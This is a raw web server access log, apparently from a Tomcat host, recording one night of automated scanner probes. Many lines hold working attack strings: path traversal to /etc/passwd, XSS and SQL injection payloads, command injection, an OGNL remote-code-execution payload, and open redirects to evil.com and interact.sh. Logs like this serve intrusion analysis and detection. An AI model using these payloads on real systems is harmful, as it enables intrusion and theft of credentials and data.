Current File : //usr/local/tomcat8/logs/localhost_access_log.2023-03-08.txt
72.44.65.82 - - [08/Mar/2023:00:01:29 +0530] "GET /js/elFinder.version.js HTTP/1.1" 404 1038
152.89.196.211 - - [08/Mar/2023:00:12:28 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
152.89.196.211 - - [08/Mar/2023:00:13:49 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:00:15:47 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:00:16:32 +0530] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1094
72.44.65.82 - - [08/Mar/2023:00:16:51 +0530] "POST /service/extdirect HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:17:49 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:00:19:01 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:00:19:06 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:00:19:06 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:00:19:34 +0530] "GET /cgi-bin/execute_cmd.cgi?cmd=cat%20/etc/passwd&timestamp=1589333279490 HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:00:22:32 +0530] "GET /index.php?controller=../../../../../etc/passwd%00&option=com_canteen HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:00:23:25 +0530] "GET /wp-admin/options.php HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:00:23:28 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_realtyna HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:00:24:57 +0530] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:00:24:59 +0530] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:25:09 +0530] "POST /index/gettunnel HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:00:25:13 +0530] "GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:00:25:23 +0530] "GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1072
117.198.240.31 - - [08/Mar/2023:00:39:19 +0530] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 1040
72.44.65.82 - - [08/Mar/2023:00:40:25 +0530] "GET /%0d/evil.com/ HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:00:40:26 +0530] "GET /%00/evil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:40:28 +0530] "GET /%09/evil.com/ HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:00:40:42 +0530] "GET /%5Cevil.com HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:40:50 +0530] "GET /%5cevil.com/%2f%2e%2e HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:40:51 +0530] "GET /%5chttp://103.145.51.236:8080evil.com/%2f%2e%2e HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:41:22 +0530] "GET /////%5C;@evil.com HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:41:36 +0530] "GET ////evil.com HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:00:42:08 +0530] "GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1" 404 1130
72.44.65.82 - - [08/Mar/2023:00:42:10 +0530] "GET ///;@evil.com HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:00:42:14 +0530] "GET ///%5C/evil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:42:34 +0530] "GET ///%5Ctevil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:42:46 +0530] "GET ///evil.com// HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:00:42:48 +0530] "GET ///%69%6e%74%65%72%61%63%74%2e%73%68 HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:00:42:57 +0530] "GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1132
72.44.65.82 - - [08/Mar/2023:00:43:05 +0530] "GET ///evil.com%5Ctevil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:43:37 +0530] "GET //%5C/evil.com HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:43:38 +0530] "GET //%5Cevil.com HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:43:45 +0530] "GET //evil.com HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:00:43:47 +0530] "GET /listconf?command=conf HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:00:43:57 +0530] "GET //evil.com/ HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:00:43:59 +0530] "GET //evil.com/..;/css HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:43:59 +0530] "GET //https:evil.com HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:00:44:01 +0530] "GET //http://103.145.51.236:8080evil.com/ HTTP/1.1" 404 1066
72.44.65.82 - - [08/Mar/2023:00:44:02 +0530] "GET //%E3%80%B1evil.com HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:00:44:02 +0530] "GET //%E3%80%B5evil.com HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:00:44:10 +0530] "GET //%E3%82%9Devil.com HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:00:44:21 +0530] "GET //%EF%BD%B0evil.com HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:00:44:22 +0530] "GET /%3C%3E//evil.com HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:00:44:26 +0530] "GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:00:44:30 +0530] "GET /@evil.com HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:00:44:31 +0530] "GET /@https://evil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:44:38 +0530] "GET /%5C/%5C/evil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:45:10 +0530] "GET /evil.com// HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:00:45:11 +0530] "GET /evil.com;@ HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:00:45:52 +0530] "GET /https://%2f%2f.evil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:45:54 +0530] "GET /https://%3F.evil.com/ HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:00:46:11 +0530] "GET /https://%5cevil.com@ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:46:19 +0530] "GET /https://%23.evil.com/ HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:00:46:20 +0530] "GET /https://.evil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:46:21 +0530] "GET /https://////evil.com HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:00:46:28 +0530] "GET /https:///evil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:46:36 +0530] "GET /https:///evil.com/%2e%2e HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:00:46:40 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:00:47:17 +0530] "GET /https://:80?@evil.com/ HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:00:47:47 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:00:47:54 +0530] "GET /https://%5Ctevil.com/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:48:40 +0530] "GET /https:/%5Cevil.com HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:00:48:43 +0530] "GET /https:/evil.com HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:00:48:55 +0530] "GET /http://103.145.51.236:8080evil.com HTTP/1.1" 404 1062
72.44.65.82 - - [08/Mar/2023:00:48:58 +0530] "GET /%E3%80%B1evil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:49:04 +0530] "GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1120
72.44.65.82 - - [08/Mar/2023:00:49:11 +0530] "GET /%E3%82%9Devil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:49:12 +0530] "GET /%E3%83%BCevil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:49:21 +0530] "GET /%EF%BD%B0evil.com HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:00:51:08 +0530] "GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 404 1106
72.44.65.82 - - [08/Mar/2023:00:51:39 +0530] "GET /darkstat/ HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:00:52:02 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
72.44.65.82 - - [08/Mar/2023:00:58:20 +0530] "GET /snarf_ajax.php?ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&url=1 HTTP/1.1" 404 1022
108.167.178.116 - - [08/Mar/2023:01:04:23 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:01:08:09 +0530] "GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1" 404 1108
72.44.65.82 - - [08/Mar/2023:01:09:29 +0530] "GET /tool/log/c.php?host=2MgieGn7PvttNS5T7z0OiGGm4rK&strip_slashes=md5 HTTP/1.1" 404 1022
198.235.24.177 - - [08/Mar/2023:01:09:34 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:01:11:23 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_graphics HTTP/1.1" 404 1012
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:01:13:21 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [08/Mar/2023:01:13:26 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:01:13:26 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:01:13:55 +0530] "GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:01:15:54 +0530] "POST /royal_event/companyprofile.php HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:01:17:16 +0530] "GET /sample-apps/hello/%2f/ HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:01:17:45 +0530] "GET /navigate/login.php HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:01:18:08 +0530] "GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:01:19:23 +0530] "GET /nagios/side.php HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:01:19:25 +0530] "GET /nagios/side.php HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:01:22:35 +0530] "GET /.env HTTP/1.1" 404 1002
72.44.65.82 - - [08/Mar/2023:01:22:35 +0530] "GET /.env.dev.local HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:01:23:16 +0530] "GET /.env.example HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:01:23:18 +0530] "GET /.env.stage HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:01:23:38 +0530] "GET /.env.old HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:01:35:07 +0530] "GET /index.jsp HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:01:35:27 +0530] "GET /osm/REGISTER.cmd HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:01:35:30 +0530] "GET /osm_tiles/REGISTER.cmd HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:01:35:56 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:01:35:57 +0530] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:01:36:35 +0530] "GET /super/login.html?lang=en HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:01:38:34 +0530] "GET /wp-json/rps_result/v1/route/search_student?batch_id=1&department_id=1 HTTP/1.1" 404 1078
90.151.171.106 - - [08/Mar/2023:01:38:54 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:01:38:54 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:01:38:54 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:01:38:54 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:01:38:54 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:01:38:59 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:01:38:59 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:01:38:59 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:01:39:57 +0530] "POST /login/verify HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:01:40:20 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
179.60.147.71 - - [08/Mar/2023:01:42:46 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:01:42:50 +0530] "PUT /fileserver/test.txt HTTP/1.1" 403 1004
72.44.65.82 - - [08/Mar/2023:01:42:51 +0530] "GET /fileserver/test.txt HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:01:43:36 +0530] "GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:01:43:37 +0530] "GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:01:43:53 +0530] "POST /network_test.php HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:01:44:56 +0530] "POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1" 404 1128
162.243.140.16 - - [08/Mar/2023:01:45:39 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:01:45:59 +0530] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1024
162.243.140.16 - - [08/Mar/2023:01:46:18 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:01:48:44 +0530] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:02:02:10 +0530] "GET /phpmyadmin/ HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:02:02:52 +0530] "GET /index.php?include_file=../../../../../../etc/passwd&option=com_pro_desk HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:02:04:38 +0530] "GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh HTTP/1.1" 404 1066
72.44.65.82 - - [08/Mar/2023:02:06:35 +0530] "GET /seeyon/webmail.do?filePath=../conf/datasourceCtp.properties&filename=index.jsp&method=doDownloadAtt HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:02:08:18 +0530] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 1084
72.44.65.82 - - [08/Mar/2023:02:09:15 +0530] "GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:02:10:17 +0530] "t3 12.2.1 " 400 -
72.44.65.82 - - [08/Mar/2023:02:10:36 +0530] "POST /api/user/login HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:02:10:37 +0530] "GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1" 404 1062
72.44.65.82 - - [08/Mar/2023:02:11:06 +0530] "GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1" 404 1088
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:02:13:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:02:13:21 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:02:13:21 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:02:16:24 +0530] "POST /api/tokens HTTP/1.1" 404 1014
107.189.7.43 - - [08/Mar/2023:02:19:25 +0530] "CONNECT baidu.com:443 HTTP/1.1" 400 -
170.64.168.11 - - [08/Mar/2023:02:21:37 +0530] "-" 400 -
170.64.168.11 - - [08/Mar/2023:02:21:38 +0530] "-" 400 -
170.64.168.11 - - [08/Mar/2023:02:21:38 +0530] "GET / HTTP/1.1" 200 11250
170.64.168.11 - - [08/Mar/2023:02:21:39 +0530] "-" 400 -
170.64.168.11 - - [08/Mar/2023:02:21:40 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:02:28:14 +0530] "GET /plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1 HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:02:31:14 +0530] "GET /themes HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:02:32:22 +0530] "GET /setup/install.php HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:02:32:24 +0530] "GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:02:34:42 +0530] "GET /api/users/admin/check HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:02:34:48 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:02:35:11 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:02:36:01 +0530] "GET /debug/pprof/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:02:37:20 +0530] "GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:02:37:30 +0530] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:02:38:01 +0530] "GET /cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 HTTP/1.1" 404 1034
92.118.39.82 - - [08/Mar/2023:02:43:01 +0530] "GET / HTTP/1.1" 200 11250
123.14.254.65 - - [08/Mar/2023:02:44:02 +0530] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 1040
199.195.248.153 - - [08/Mar/2023:02:50:03 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:02:53:58 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_onlineexam HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:02:55:22 +0530] "GET /_vti_pvt/service.pwd HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:02:56:18 +0530] "GET /user.php?act=login HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:02:56:19 +0530] "GET /user.php?act=login HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:02:58:32 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:03:00:27 +0530] "POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1" 404 1104
90.151.171.106 - - [08/Mar/2023:03:02:10 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:03:02:10 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:03:02:10 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:03:02:10 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:03:02:10 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:03:02:15 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:03:02:15 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:03:02:15 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:03:02:52 +0530] "GET /login?next=http://interact.sh/?app.scan/ HTTP/1.1" 404 1004
72.44.65.82 - - [08/Mar/2023:03:02:53 +0530] "GET /signup?next=http://interact.sh/?app.scan/ HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:03:04:02 +0530] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 404 992
72.44.65.82 - - [08/Mar/2023:03:05:06 +0530] "GET /admin/cert_download.php?certfile=../../../../../../../../etc/passwd&file=pqpqpqpq.txt HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:03:20:56 +0530] "GET /wp-content/plugins/duplicator/files/installer.cleanup.php?package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&remove=1 HTTP/1.1" 404 1108
72.44.65.82 - - [08/Mar/2023:03:20:57 +0530] "GET /category_view.php HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:03:21:05 +0530] "GET /folder_view.php HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:03:21:29 +0530] "GET /appsettings.Production.json HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:03:23:12 +0530] "GET /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:03:24:42 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_news_portal HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:03:26:32 +0530] "GET /login HTTP/1.1" 404 1004
72.44.65.82 - - [08/Mar/2023:03:26:39 +0530] "POST /./RestAPI/Connection HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:03:26:46 +0530] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:03:27:24 +0530] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:03:28:06 +0530] "GET /RestAPI/ImportTechnicians HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:03:29:47 +0530] "GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1158
72.44.65.82 - - [08/Mar/2023:03:29:47 +0530] "GET /manage/log/view?base=../../../../../../../../../../&filename=/windows/win.ini HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:03:29:59 +0530] "GET /manage/log/view?base=../../../../../../../../../../&filename=/etc/passwd HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:03:31:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchadownloadsattach HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:03:31:14 +0530] "POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1" 404 1074
108.167.178.116 - - [08/Mar/2023:03:32:25 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:03:47:37 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:03:48:07 +0530] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:03:49:54 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:03:51:49 +0530] "GET /plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:03:54:29 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:03:54:32 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:03:55:13 +0530] "GET /?redirect=https://interact.sh/&wptouch_switch=desktop HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:03:55:28 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
